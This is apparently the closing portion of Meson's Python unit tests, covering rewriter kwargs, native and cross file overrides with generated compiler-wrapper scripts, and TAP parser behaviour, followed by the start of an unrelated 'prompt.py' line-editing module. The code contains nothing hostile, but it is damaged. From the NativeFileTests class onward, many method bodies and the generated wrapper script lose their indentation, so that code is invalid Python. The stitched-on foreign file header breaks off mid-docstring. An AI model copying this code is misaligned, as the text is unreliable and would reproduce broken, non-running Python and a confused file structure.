        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_set(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
                'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
                'dependency#dep1': {'required': True, 'method': 'cmake'}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_add(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_remove(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'license': 'GPL'},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_remove_regex(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_kwargs_delete(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {},
                'target#tgt1': {},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_default_options_set(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)

    def test_default_options_delete(self):
        self.prime('3 kwargs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'kwargs': {
                'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
                'target#tgt1': {'build_by_default': True},
                'dependency#dep1': {'required': False}
            }
        }
        self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
    super().setUp()
    # Project used by most tests in this class; the counters provide
    # unique filenames for generated config files and wrapper scripts.
    self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
    self.current_config = 0
    self.current_wrapper = 0
def helper_create_native_file(self, values):
    """Create a config file as a temporary file.

    values should be a nested dictionary structure of {section: {key:
    value}}. Returns the path of the generated file.
    """
    path = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
    self.current_config += 1
    chunks = []
    for section, entries in values.items():
        chunks.append('[{}]\n'.format(section))
        for key, value in entries.items():
            chunks.append("{}='{}'\n".format(key, value))
    with open(path, 'wt') as f:
        f.writelines(chunks)
    return path
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
    """Creates a wrapper around a binary that overrides specific values.

    Each kwarg becomes a --<name> option of the generated script; when that
    option is passed, the corresponding value is printed (to stdout, or to
    the stream named by the special 'outfile' kwarg) and the script exits.
    Any other invocation is forwarded to the real *binary*.
    Returns the wrapper path (a .bat trampoline on Windows).
    """
    filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
    extra_args = extra_args or {}
    self.current_wrapper += 1
    # Haiku keeps env outside /usr/bin.
    if is_haiku():
        chbang = '#!/bin/env python3'
    else:
        chbang = '#!/usr/bin/env python3'
    with open(filename, 'wt') as f:
        f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
        # One store_true option per overridden value (e.g. --version).
        for name in chain(extra_args, kwargs):
            f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
        f.write(' args, extra_args = parser.parse_known_args()\n')
        for name, value in chain(extra_args.items(), kwargs.items()):
            f.write(' if args.{}:\n'.format(name))
            f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
            f.write(' sys.exit(0)\n')
        # Fallthrough: delegate to the wrapped binary verbatim.
        f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
    if not is_windows():
        os.chmod(filename, 0o755)
        return filename
    # On windows we need yet another level of indirection, as cmd cannot
    # invoke python files itself, so instead we generate a .bat file, which
    # invokes our python wrapper
    batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
    with open(batfile, 'wt') as f:
        f.write(r'@{} {} %*'.format(sys.executable, filename))
    return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
    """Helper for generating tests for overriding compilers for languages
    with more than one implementation, such as C, C++, ObjC, ObjC++, and D.

    *cb* receives the currently detected compiler and returns the
    (replacement binary, expected compiler id) pair.
    """
    env = get_fake_env()
    getter = getattr(env, 'detect_{}_compiler'.format(lang))
    getter = functools.partial(getter, for_machine)
    cc = getter()
    binary, newid = cb(cc)
    # Point the per-machine binary table at the replacement and re-detect.
    env.binaries[for_machine].binaries[lang] = binary
    compiler = getter()
    self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
    # When several native files define the same binary, the later file
    # must win: config2's wrapper reports version 12345.
    wrapper = self.helper_create_binary_wrapper('bash', version='foo')
    config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
    wrapper = self.helper_create_binary_wrapper('bash', version='12345')
    config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
    self.init(self.testcase, extra_args=[
        '--native-file', config, '--native-file', config2,
        '-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
    # A native file may be a pipe (fifo) rather than a regular file.
    fifo = os.path.join(self.builddir, 'native.file')
    os.mkfifo(fifo)
    with tempfile.TemporaryDirectory() as d:
        wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')

        def filler():
            # Writing blocks until meson opens the fifo for reading,
            # hence the background thread.
            with open(fifo, 'w') as f:
                f.write('[binaries]\n')
                f.write("bash = '{}'\n".format(wrapper))

        thread = threading.Thread(target=filler)
        thread.start()
        self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
        thread.join()
        os.unlink(fifo)
        # A second configure with --wipe must not try to reread the fifo.
        self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
    # Multiple native files with disjoint binary entries must be merged.
    wrapper = self.helper_create_binary_wrapper('bash', version='12345')
    config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
    wrapper = self.helper_create_binary_wrapper('python')
    config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
    self.init(self.testcase, extra_args=[
        '--native-file', config, '--native-file', config2,
        '-Dcase=find_program'])
def _simple_test(self, case, binary):
    """Wrap *binary* with a fake version 12345 and run the named test case."""
    fake_binary = self.helper_create_binary_wrapper(binary, version='12345')
    native_file = self.helper_create_native_file({'binaries': {binary: fake_binary}})
    self.init(self.testcase, extra_args=['--native-file', native_file, '-Dcase={}'.format(case)])
def test_find_program(self):
    # find_program() must return the native-file-provided wrapper.
    self._simple_test('find_program', 'bash')

def test_config_tool_dep(self):
    # Do the skip at this level to avoid screwing up the cache
    if mesonbuild.environment.detect_msys2_arch():
        raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
    if not shutil.which('llvm-config'):
        raise unittest.SkipTest('No llvm-installed, cannot test')
    self._simple_test('config_dep', 'llvm-config')

def test_python3_module(self):
    self._simple_test('python3', 'python3')

def test_python_module(self):
    if is_windows():
        # Bat adds extra crap to stdout, so the version check logic in the
        # python module breaks. This is fine on other OSes because they
        # don't need the extra indirection.
        raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
    if os.path.exists('/etc/debian_version'):
        rc = subprocess.call(['pkg-config', '--cflags', 'python2'],
                             stdout=subprocess.DEVNULL,
                             stderr=subprocess.DEVNULL)
        if rc != 0:
            # Python 2 will be removed in Debian Bullseye, thus we must
            # remove the build dependency on python2-dev. Keep the tests
            # but only run them if dev packages are available.
            raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
    self._simple_test('python', 'python')
# The following tests override a detected compiler with the "other"
# implementation of the same language (gcc <-> clang) via the native file
# machinery; each skips when only one implementation is installed.

@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
    def cb(comp):
        if comp.id == 'gcc':
            if not shutil.which('clang'):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'clang', 'clang'
        if not is_real_gnu_compiler(shutil.which('gcc')):
            raise unittest.SkipTest('Only one compiler found, cannot test.')
        return 'gcc', 'gcc'
    self.helper_for_compiler('c', cb)

@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
    def cb(comp):
        if comp.id == 'gcc':
            if not shutil.which('clang++'):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'clang++', 'clang'
        if not is_real_gnu_compiler(shutil.which('g++')):
            raise unittest.SkipTest('Only one compiler found, cannot test.')
        return 'g++', 'gcc'
    self.helper_for_compiler('cpp', cb)

@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
    def cb(comp):
        if comp.id == 'gcc':
            if not shutil.which('clang'):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'clang', 'clang'
        if not is_real_gnu_compiler(shutil.which('gcc')):
            raise unittest.SkipTest('Only one compiler found, cannot test.')
        return 'gcc', 'gcc'
    self.helper_for_compiler('objc', cb)

@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
    def cb(comp):
        if comp.id == 'gcc':
            if not shutil.which('clang++'):
                raise unittest.SkipTest('Only one compiler found, cannot test.')
            return 'clang++', 'clang'
        if not is_real_gnu_compiler(shutil.which('g++')):
            raise unittest.SkipTest('Only one compiler found, cannot test.')
        return 'g++', 'gcc'
    self.helper_for_compiler('objcpp', cb)
# Same idea for D, C# and Fortran, which have several implementations each.

@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
    def cb(comp):
        if comp.id == 'dmd':
            if shutil.which('ldc'):
                return 'ldc', 'ldc'
            elif shutil.which('gdc'):
                return 'gdc', 'gdc'
            else:
                raise unittest.SkipTest('No alternative dlang compiler found.')
        if shutil.which('dmd'):
            return 'dmd', 'dmd'
        raise unittest.SkipTest('No alternative dlang compiler found.')
    self.helper_for_compiler('d', cb)

@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
    def cb(comp):
        if comp.id == 'csc':
            if not shutil.which('mcs'):
                raise unittest.SkipTest('No alternate C# implementation.')
            return 'mcs', 'mcs'
        if not shutil.which('csc'):
            raise unittest.SkipTest('No alternate C# implementation.')
        return 'csc', 'csc'
    self.helper_for_compiler('cs', cb)

@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
    def cb(comp):
        if comp.id == 'lcc':
            if shutil.which('lfortran'):
                return 'lfortran', 'lcc'
            raise unittest.SkipTest('No alternate Fortran implementation.')
        elif comp.id == 'gcc':
            if shutil.which('ifort'):
                # There is an ICC for windows (windows build, linux host),
                # but we don't support that ATM so lets not worry about it.
                if is_windows():
                    return 'ifort', 'intel-cl'
                return 'ifort', 'intel'
            elif shutil.which('flang'):
                return 'flang', 'flang'
            elif shutil.which('pgfortran'):
                return 'pgfortran', 'pgi'
            # XXX: there are several other fortran compilers meson
            # supports, but I don't have any of them to test with
            raise unittest.SkipTest('No alternate Fortran implementation.')
        if not shutil.which('gfortran'):
            raise unittest.SkipTest('No alternate Fortran implementation.')
        return 'gfortran', 'gcc'
    self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
    """Tests for cross-file handling that is not about actual cross
    compilation — mainly directory-option overrides coming from cross files.
    """
    def test_cross_file_dirs(self):
        testdir = os.path.join(self.unit_test_dir, '60 native file override')
        # One '-Ddef_<name>dir=<name>bar' per default directory option.
        names = ['bin', 'data', 'include', 'info', 'lib', 'libexec',
                 'locale', 'localstate', 'man', 'sbin', 'sharedstate',
                 'sysconf']
        self.init(testdir, default_args=False,
                  extra_args=['--native-file', os.path.join(testdir, 'nativefile'),
                              '--cross-file', os.path.join(testdir, 'crossfile')] +
                             ['-Ddef_{0}dir={0}bar'.format(n) for n in names])
    def test_cross_file_dirs_overriden(self):
        # libdir gets an explicit command-line override; the rest follow
        # the usual '-Ddef_<name>dir=<name>bar' pattern.
        testdir = os.path.join(self.unit_test_dir, '60 native file override')
        names = ['bin', 'data', 'include', 'info', 'libexec', 'locale',
                 'localstate', 'man', 'sbin', 'sharedstate', 'sysconf']
        self.init(testdir, default_args=False,
                  extra_args=['--native-file', os.path.join(testdir, 'nativefile'),
                              '--cross-file', os.path.join(testdir, 'crossfile'),
                              '-Ddef_libdir=liblib', '-Dlibdir=liblib'] +
                             ['-Ddef_{0}dir={0}bar'.format(n) for n in names])
    def test_cross_file_dirs_chain(self):
        # crossfile2 overrides crossfile overrides nativefile
        testdir = os.path.join(self.unit_test_dir, '60 native file override')
        names = ['data', 'include', 'info', 'lib', 'libexec', 'locale',
                 'localstate', 'man', 'sbin', 'sharedstate', 'sysconf']
        self.init(testdir, default_args=False,
                  extra_args=['--native-file', os.path.join(testdir, 'nativefile'),
                              '--cross-file', os.path.join(testdir, 'crossfile'),
                              '--cross-file', os.path.join(testdir, 'crossfile2'),
                              '-Ddef_bindir=binbar2'] +
                             ['-Ddef_{0}dir={0}bar'.format(n) for n in names])
class TAPParserTests(unittest.TestCase):
    """Unit tests for the TAP (Test Anything Protocol) stream parser.

    Each test feeds a literal TAP document to ``parse_tap`` and asserts the
    exact sequence of events (tests, plans, errors, bailouts) it yields.
    """
    # --- assertion helpers over the parser's event stream ---
    def assert_test(self, events, **kwargs):
        # 'explanation' defaults to None so callers can omit it.
        if 'explanation' not in kwargs:
            kwargs['explanation'] = None
        self.assertEqual(next(events), TAPParser.Test(**kwargs))
    def assert_plan(self, events, **kwargs):
        # 'skipped' and 'explanation' get defaults so callers can omit them.
        if 'skipped' not in kwargs:
            kwargs['skipped'] = False
        if 'explanation' not in kwargs:
            kwargs['explanation'] = None
        self.assertEqual(next(events), TAPParser.Plan(**kwargs))
    def assert_version(self, events, **kwargs):
        self.assertEqual(next(events), TAPParser.Version(**kwargs))
    def assert_error(self, events):
        # Only the event type is checked; error messages are free-form.
        self.assertEqual(type(next(events)), TAPParser.Error)
    def assert_bailout(self, events, **kwargs):
        self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
    def assert_last(self, events):
        # The stream must be exhausted.
        with self.assertRaises(StopIteration):
            next(events)
    # --- parser construction helpers ---
    def parse_tap(self, s):
        parser = TAPParser(io.StringIO(s))
        return iter(parser.parse())
    def parse_tap_v13(self, s):
        # Prepend and consume the TAP 13 version header.
        events = self.parse_tap('TAP version 13\n' + s)
        self.assert_version(events, version=13)
        return events
    # --- the actual test cases ---
    def test_empty(self):
        events = self.parse_tap('')
        self.assert_last(events)
    def test_empty_plan(self):
        # A '1..0' plan means the whole file is skipped.
        events = self.parse_tap('1..0')
        self.assert_plan(events, count=0, late=False, skipped=True)
        self.assert_last(events)
    def test_plan_directive(self):
        events = self.parse_tap('1..0 # skipped for some reason')
        self.assert_plan(events, count=0, late=False, skipped=True,
                         explanation='for some reason')
        self.assert_last(events)
        # SKIP on a non-empty plan is an error, but parsing continues.
        events = self.parse_tap('1..1 # skipped for some reason\nok 1')
        self.assert_error(events)
        self.assert_plan(events, count=1, late=False, skipped=True,
                         explanation='for some reason')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
        # TODO is not a valid plan directive.
        events = self.parse_tap('1..1 # todo not supported here\nok 1')
        self.assert_error(events)
        self.assert_plan(events, count=1, late=False, skipped=False,
                         explanation='not supported here')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_ok(self):
        events = self.parse_tap('ok')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_with_number(self):
        events = self.parse_tap('ok 1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_with_name(self):
        events = self.parse_tap('ok 1 abc')
        self.assert_test(events, number=1, name='abc', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_not_ok(self):
        events = self.parse_tap('not ok')
        self.assert_test(events, number=1, name='', result=TestResult.FAIL)
        self.assert_last(events)
    def test_one_test_todo(self):
        # TODO flips the meaning: failure is expected, success is not.
        events = self.parse_tap('not ok 1 abc # TODO')
        self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
        self.assert_last(events)
        events = self.parse_tap('ok 1 abc # TODO')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
        self.assert_last(events)
    def test_one_test_skip(self):
        events = self.parse_tap('ok 1 abc # SKIP')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
        self.assert_last(events)
    def test_one_test_skip_failure(self):
        # A failing SKIP is still reported as a failure.
        events = self.parse_tap('not ok 1 abc # SKIP')
        self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
        self.assert_last(events)
    def test_many_early_plan(self):
        events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
        self.assert_plan(events, count=4, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_test(events, number=3, name='', result=TestResult.OK)
        self.assert_test(events, number=4, name='', result=TestResult.FAIL)
        self.assert_last(events)
    def test_many_late_plan(self):
        events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_test(events, number=3, name='', result=TestResult.OK)
        self.assert_test(events, number=4, name='', result=TestResult.FAIL)
        self.assert_plan(events, count=4, late=True)
        self.assert_last(events)
    def test_directive_case(self):
        # Directives are matched case-insensitively.
        events = self.parse_tap('ok 1 abc # skip')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
        self.assert_last(events)
        events = self.parse_tap('ok 1 abc # ToDo')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
        self.assert_last(events)
    def test_directive_explanation(self):
        events = self.parse_tap('ok 1 abc # skip why')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
                         explanation='why')
        self.assert_last(events)
        events = self.parse_tap('ok 1 abc # ToDo Because')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
                         explanation='Because')
        self.assert_last(events)
    def test_one_test_early_plan(self):
        events = self.parse_tap('1..1\nok')
        self.assert_plan(events, count=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_late_plan(self):
        events = self.parse_tap('ok\n1..1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, count=1, late=True)
        self.assert_last(events)
    def test_out_of_order(self):
        # Test numbers must be sequential; a gap produces an error event.
        events = self.parse_tap('ok 2')
        self.assert_error(events)
        self.assert_test(events, number=2, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_middle_plan(self):
        # A plan in the middle of the tests is an error.
        events = self.parse_tap('ok 1\n1..2\nok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, count=2, late=True)
        self.assert_error(events)
        self.assert_test(events, number=2, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_too_many_plans(self):
        # Only one plan is allowed per stream.
        events = self.parse_tap('1..1\n1..2\nok 1')
        self.assert_plan(events, count=1, late=False)
        self.assert_error(events)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_too_many(self):
        # More tests than planned produces an error at the end.
        events = self.parse_tap('ok 1\nnot ok 2\n1..1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_plan(events, count=1, late=True)
        self.assert_error(events)
        self.assert_last(events)
        events = self.parse_tap('1..1\nok 1\nnot ok 2')
        self.assert_plan(events, count=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_error(events)
        self.assert_last(events)
    def test_too_few(self):
        # Fewer tests than planned also produces an error at the end.
        events = self.parse_tap('ok 1\nnot ok 2\n1..3')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_plan(events, count=3, late=True)
        self.assert_error(events)
        self.assert_last(events)
        events = self.parse_tap('1..3\nok 1\nnot ok 2')
        self.assert_plan(events, count=3, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_error(events)
        self.assert_last(events)
    def test_too_few_bailout(self):
        # A bailout explains missing tests, so no extra error is emitted.
        events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
        self.assert_plan(events, count=3, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_bailout(events, message='no third test')
        self.assert_last(events)
    def test_diagnostics(self):
        # '#' diagnostic lines are ignored wherever they appear.
        events = self.parse_tap('1..1\n# ignored\nok 1')
        self.assert_plan(events, count=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
        events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
        self.assert_plan(events, count=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
        events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, count=1, late=True)
        self.assert_last(events)
    def test_empty_line(self):
        events = self.parse_tap('1..1\n\nok 1')
        self.assert_plan(events, count=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_unexpected(self):
        # Unparseable lines produce an error event but don't stop parsing.
        events = self.parse_tap('1..1\ninvalid\nok 1')
        self.assert_plan(events, count=1, late=False)
        self.assert_error(events)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_version(self):
        events = self.parse_tap('TAP version 13\n')
        self.assert_version(events, version=13)
        self.assert_last(events)
        # Only version 13 is accepted.
        events = self.parse_tap('TAP version 12\n')
        self.assert_error(events)
        self.assert_last(events)
        # The version line must come first.
        events = self.parse_tap('1..0\nTAP version 13\n')
        self.assert_plan(events, count=0, late=False, skipped=True)
        self.assert_error(events)
        self.assert_last(events)
    def test_yaml(self):
        # An indented '---'/'...' YAML block after a test is skipped.
        events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.OK)
        self.assert_last(events)
        # An unterminated YAML block is an error.
        events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_error(events)
        self.assert_last(events)
        events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_error(events)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
    """Whether a Clang compiler is at least a given version.

    AppleClang has its own version numbering, so a separate minimum
    version is used for it.

    Parameters
    ----------
    compiler:
        Meson compiler object
    minver: str
        minimum version for regular Clang
    apple_minver: str
        minimum version for AppleClang

    Returns
    -------
    at_least: bool
        Clang is at least the relevant minimum version
    """
    apple_classes = (mesonbuild.compilers.AppleClangCCompiler,
                     mesonbuild.compilers.AppleClangCPPCompiler)
    required = apple_minver if isinstance(compiler, apple_classes) else minver
    return version_compare(compiler.version, required)
def unset_envs():
    # For unit tests we must fully control all command lines
    # so that there are no unexpected changes coming from the
    # environment, for example when doing a package build.
    to_clear = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
    for name in to_clear:
        # pop() with a default is a no-op when the variable is absent.
        os.environ.pop(name, None)
def convert_args(argv):
    """Translate unittest-style CLI arguments into pytest arguments.

    Dotted selectors like 'ClassName.test_name' become pytest ``-k``
    expressions; a '-v' flag is passed through unchanged.
    """
    pytest_args = ['-v'] if '-v' in argv else []
    # Non-flag arguments select tests; 'ClassName.test_name' turns into
    # 'ClassName and test_name'.
    selectors = [' and '.join(arg.split('.'))
                 for arg in argv if not arg.startswith('-')]
    if selectors:
        pytest_args += ['-k', ' or '.join(selectors)]
    return pytest_args
def main():
    """Run the test suite: parallel via pytest-xdist when available,
    otherwise fall back to plain unittest."""
    unset_envs()
    try:
        import pytest  # noqa: F401
        # Need pytest-xdist for `-n` arg
        import xdist  # noqa: F401
        args = ['-n', 'auto', './run_unittests.py'] + convert_args(sys.argv[1:])
        return subprocess.run(python_command + ['-m', 'pytest'] + args).returncode
    except ImportError:
        print('pytest-xdist not found, using unittest instead')
        # All attempts at locating pytest failed, fall back to plain unittest.
        cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
                 'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
                 'TAPParserTests',
                 'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
                 'WindowsTests', 'DarwinTests']
        return unittest.main(defaultTest=cases, buffer=True)
# Script entry point: exit with main()'s return code.
if __name__ == '__main__':
    raise SystemExit(main())
|
prompt.py | """
Line editing functionality.
---------------------------
This provides a UI for a line input, similar to GNU Readline, libedit and
linenoise.
Either call the `prompt` function for every line input. Or create an instance
of the :class:`.PromptSession` class and call the `prompt` method from that
class. In the second case, we'll have a 'session' that keeps all the state like
the history in between several calls.
There is a lot of overlap between the arguments taken by the `prompt` function
